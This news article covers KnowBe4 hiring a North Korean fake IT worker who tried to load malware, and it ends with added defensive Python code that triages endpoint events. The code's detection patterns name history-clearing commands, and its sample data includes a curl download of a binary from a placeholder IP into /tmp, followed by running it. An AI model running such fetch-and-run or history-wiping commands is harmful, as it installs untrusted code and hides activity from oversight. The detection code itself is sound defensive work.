A North Korean hacker tricked an American security vendor into hiring him and immediately tried to hack it

KnowBe4, a US-based security vendor, has revealed that it unwittingly hired a North Korean hacker who attempted to load malware onto the company’s network. KnowBe4 CEO and founder Stu Sjouwerman described the incident in a blog post this week, calling it a cautionary tale that was fortunately caught before it caused major problems.

“First and foremost: no illegal access was gained and no data was lost, compromised or leaked on any KnowBe4 system,” Sjouwerman wrote. “This is not a data breach notification – there was none. Consider this an organizational learning moment I’m sharing with you. If it can happen to us, it can happen to almost anyone. Don’t let it happen to you.”

KnowBe4 said it was looking for a software engineer for its internal IT AI team. The company hired a person who was believed to be from North Korea and was “using a valid but stolen US-based identity” and a photo that was “enhanced” using AI. There is now an active FBI investigation amid suspicion that the worker is what KnowBe4’s blog post called “an insider/nation-state threat actor.”

KnowBe4 operates in 11 countries and is headquartered in Florida. It provides security awareness training, including phishing security testing, to corporate clients. If you occasionally receive a fake phishing email from your employer, you may be working for a company that uses the KnowBe4 service to assess its employees’ ability to spot scams.

The person passed the background check and video interviews

KnowBe4 hired the North Korean hacker through its usual process. “We posted the job, received resumes, conducted interviews, ran background checks, verified references, and hired the person. We sent him his Mac workstation, and the moment he received it, he immediately started loading malware,” the company said.

Although the photo provided to HR was fake, the person who interviewed for the job apparently looked enough like it to pass muster. KnowBe4’s HR team “conducted four video conference interviews on separate occasions, confirming that the individual matched the photo provided on their application,” the post said. “Additionally, a background check and all other standard pre-employment checks were conducted and there were no issues due to the stolen identity being used. This was a real person using a valid but stolen US-based identity. The image was ‘enhanced’ using artificial intelligence.”

The two images at the top of this story are a stock photo and what KnowBe4 says is an AI fake based on the stock photo. The stock photo is on the left and the AI fake is on the right.

The employee, referred to as “XXXX” in the blog post, was hired as a principal software engineer. The new employee’s suspicious activities were detected by security software, prompting KnowBe4’s Security Operations Center (SOC) to investigate:

On July 15, 2024, a series of suspicious activities were detected on the user starting at 9:55 pm EST. When these alerts came in, KnowBe4’s SOC team reached out to the user to inquire about the anomalous activity and the possible cause. XXXX responded to the SOC that he was following the steps in his router’s guide to troubleshoot a speed issue and that this could have led to a breach.

The attacker performed several actions to manipulate session history files, transfer potentially harmful files, and execute unauthorized software. He used a Raspberry Pi to download the malware. SOC attempted to obtain more details from XXXX, including getting him to call. XXXX stated that he was unavailable for a call and then stopped responding. At around 10:20 pm EST, SOC contained XXXX’s device.

“Fake IT worker from North Korea”

The SOC’s analysis indicated that the malware payload “may have been intentional on the part of the user” and the group “suspected that it could be an insider or nation-state threat actor,” the blog post states.

“We shared the collected data with our friends at Mandiant, a global expert in cybersecurity, and with the FBI to corroborate our initial findings. It turns out that this was a fake IT worker from North Korea,” Sjouwerman wrote.

KnowBe4 said it can’t provide many details because of the FBI’s active investigation. But the person hired for the job could have logged into the company’s computer remotely from North Korea, Sjouwerman explained:

The way this system works is that the fake worker requests that their workstation be shipped to an address that is basically an “IT mule laptop farm.” They then connect via VPN from wherever they are physically located (North Korea or across the border in China) and work the night shift to make it look like they are working during the day in the United States. The scam is that they are actually doing the job, getting paid well, and giving a lot of money to North Korea to fund their illegal programs. I don’t have to tell you how serious a risk this is. It’s a good thing that new employees are in a very restricted area when they start and don’t have access to production systems. Our checks caught this, but it was certainly a learning moment that I’m happy to share with everyone.
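The SOC narrative above lists three concrete indicators (tampering with shell history files, executing software from an untrusted location, and a burst of activity late in the US evening, which is exactly the night-shift pattern Sjouwerman describes for an operator connecting through a laptop farm). The following is an added example written for this page, not code from KnowBe4, Mandiant or Ars Technica: a small triage routine that runs those three checks over endpoint telemetry. The event format, the regexes, the trusted-path allowlist, the business-hours window and the sample events are all assumptions constructed for the example; the timestamps are chosen to mirror the 9:55 pm Eastern start time in the post (UTC-4 in July).

```python
"""Triage endpoint events for the three indicators described in the KnowBe4 post.

Added example; rules and sample data are constructed, not taken from any vendor.
"""
import re
from datetime import datetime, time, timedelta, timezone

# Shell constructs commonly used to blind command history (assumed patterns).
HISTORY_TAMPER = re.compile(
    r"(history\s+-c|unset\s+HISTFILE|HISTFILE=/dev/null|HISTSIZE=0"
    r"|rm\s+(-f\s+)?~?/?\S*\.(bash|zsh)_history|>\s*~?/?\S*\.(bash|zsh)_history)"
)
HISTORY_FILES = re.compile(r"\.(bash|zsh|python)_history$")

# Directories an interactive user may execute binaries from (assumed policy).
TRUSTED_EXEC_PREFIXES = ("/usr/bin/", "/bin/", "/usr/local/bin/", "/Applications/")

# Expected working window in the employee's claimed local time (assumed policy).
BUSINESS_HOURS = (time(7, 0), time(19, 0))


def parse_ts(s):
    """Parse an ISO-8601 UTC timestamp such as 2024-07-16T01:55:00Z."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def is_off_hours(ts_utc, claimed_utc_offset_hours):
    """True if the event falls outside business hours in the claimed location.

    A fixed offset is used here to stay dependency-free; a production version
    would resolve the claimed location through zoneinfo to handle DST.
    """
    local = ts_utc.astimezone(timezone(timedelta(hours=claimed_utc_offset_hours)))
    if local.weekday() >= 5:  # Saturday/Sunday
        return True
    return not (BUSINESS_HOURS[0] <= local.time() < BUSINESS_HOURS[1])


def triage(events, claimed_utc_offset_hours=-4, off_hours_ratio=0.5):
    """Return findings for history tampering, untrusted execution and off-hours work."""
    findings = {"history_tampering": [], "untrusted_exec": [], "off_hours": None}
    off = 0
    for ev in events:
        if is_off_hours(parse_ts(ev["ts"]), claimed_utc_offset_hours):
            off += 1
        if ev["type"] == "process":
            cmd = ev["cmdline"]
            if HISTORY_TAMPER.search(cmd):
                findings["history_tampering"].append(cmd)
            exe = cmd.split()[0]
            # Absolute paths outside the allowlist (e.g. /tmp) are flagged;
            # bare shell builtins like "history" have no path and are skipped here.
            if exe.startswith("/") and not exe.startswith(TRUSTED_EXEC_PREFIXES):
                findings["untrusted_exec"].append(exe)
        elif ev["type"] == "file_delete" and HISTORY_FILES.search(ev["path"]):
            findings["history_tampering"].append("delete " + ev["path"])
    ratio = off / len(events) if events else 0.0
    findings["off_hours"] = {"ratio": round(ratio, 2), "suspicious": ratio >= off_hours_ratio}
    return findings


# Constructed sample telemetry for one user; not real KnowBe4 data.
SAMPLE_EVENTS = [
    {"ts": "2024-07-15T14:00:00Z", "type": "process", "cmdline": "/usr/bin/git status"},
    {"ts": "2024-07-16T01:55:00Z", "type": "process", "cmdline": "/usr/bin/curl -o /tmp/agent 192.0.2.10/agent"},
    {"ts": "2024-07-16T01:57:00Z", "type": "process", "cmdline": "/tmp/agent --install"},
    {"ts": "2024-07-16T02:01:00Z", "type": "process", "cmdline": "history -c"},
    {"ts": "2024-07-16T02:02:00Z", "type": "file_delete", "path": "/Users/xxxx/.zsh_history"},
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_EVENTS).items():
        print(key, value)
```

On the sample data the routine reports one untrusted executable (`/tmp/agent`), two history-tampering events, and 80% of activity outside business hours. None of these signals is conclusive alone (plenty of legitimate engineers work late and clear their history), which is why the SOC in the story reached out to the user before containing the device; the value is in the combination, on a newly onboarded account, within minutes of the workstation arriving.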

This story originally appeared in Ars Technica.
